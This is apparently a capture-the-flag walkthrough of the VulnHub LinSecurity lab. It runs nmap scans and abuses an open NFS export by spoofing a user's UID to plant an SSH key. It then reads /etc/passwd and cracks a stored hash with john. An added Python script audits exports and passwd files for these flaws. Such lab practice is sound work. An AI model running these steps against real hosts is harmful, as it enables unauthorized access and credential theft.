Link: https://www.vulnhub.com/entry/linsecurity-1,244/
1. Net Discovery
nmap -sn 10.0.2.27/24
My target is 10.0.2.26.
2. Port scan
nmap -Pn 10.0.2.26
nmap -Pn -p1000- 10.0.2.26
There are 7 open ports: 22, 111, 2049, 35049, 38329, 57299, and 59475.
3. OS and service scan
nmap -A -p22,111,2049,35049,38329,57299,59475 10.0.2.26
There’s an NFS service.
4. Vuln scan
nmap --script vuln -p22,111,2049,35049,38329,57299,59475 10.0.2.26
Nothing useful
5. NFS scan
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.0.2.26
There’s a misconfiguration. I can mount ‘/home/peter’ to my machine.
6. Mounting /home/peter
mkdir mnt
ls
mount 10.0.2.26:/home/peter mnt
cd mnt
ls -la
7. Add public key for SSH login
Verify user permission
stat .
The username is peter, UID is 1001 and GID is 1005.
Adding fake user
groupadd -g 1005 peter
adduser peter --uid 1001 --gid 1005
Change user to peter
su peter
Create ssh key
ssh-keygen -t rsa
Copy public key to the mounted directory
mkdir .ssh
cp /home/peter/.ssh/id_rsa.pub .ssh/authorized_keys
cd .ssh
ls -la
Log in as peter via SSH with the private key
ssh -i /home/peter/.ssh/id_rsa peter@10.0.2.26
9. Privilege Escalation
Read /etc/passwd
cat /etc/passwd
There’s a password hash for user ‘insecurity’.
Copy the hash to hash.txt
echo AzER3pBZh6WZE > hash.txt
cat hash.txt
Crack w/ john
john --wordlist=/root/Desktop/rockyou.txt hash.txt
john hash.txt --show
I got the password.
NOTE: I had already solved this challenge, so my screenshot shows the hash as already cracked.
Change user to ‘insecurity’
su insecurity
whoami
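
The two findings this walkthrough relies on (the NFS export in steps 5-7 and the hash in /etc/passwd in step 9) can be checked for on your own hosts. The following Python audit is an added example, not part of the original write-up; the sample file contents are constructed (only the /home/peter path and the hash string come from the page) and the function names are hypothetical.

```python
import re

# Constructed sample files; only /home/peter and the hash string come from the write-up.
SAMPLE_EXPORTS = """\
# constructed /etc/exports
/home/peter *(rw,sync,insecure,no_subtree_check)
/srv/builds 10.0.2.0/28(ro,root_squash) backup01(rw,sec=krb5p)
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
peter:x:1001:1005:Peter:/home/peter:/bin/bash
insecurity:AzER3pBZh6WZE:2000:2000::/home/insecurity:/bin/sh
"""

def audit_exports(text):
    """Return (path, client, issue) tuples for risky NFS exports."""
    findings = []
    for raw in text.splitlines():
        parts = raw.split("#", 1)[0].split(None, 1)
        if not parts:
            continue
        path = parts[0]
        clients = parts[1].split() if len(parts) > 1 else [""]
        for tok in clients:
            m = re.fullmatch(r"([^()]*)(?:\((.*)\))?", tok)
            if not m:
                continue
            host, opts = m.group(1) or "*", set((m.group(2) or "").split(","))
            if host == "*":
                findings.append((path, host, "any-host"))
            # With the default sec=sys the server trusts the UID/GID the client
            # sends, so root_squash does not protect files owned by other users.
            if "rw" in opts and not any(o.startswith("sec=krb5") for o in opts):
                findings.append((path, host, "rw-auth-sys"))
    return findings

def audit_passwd(text):
    """Return (user, kind) for accounts whose hash sits in world-readable passwd."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or fields[1] in ("x", "") or fields[1][0] in "*!":
            continue
        des = re.fullmatch(r"[./0-9A-Za-z]{13}", fields[1])
        findings.append((fields[0], "des-crypt" if des else "other-hash"))
    return findings

if __name__ == "__main__":
    print(audit_exports(SAMPLE_EXPORTS), audit_passwd(SAMPLE_PASSWD))
```

To use it on a real host, pass the contents of /etc/exports and /etc/passwd instead of the constructed samples.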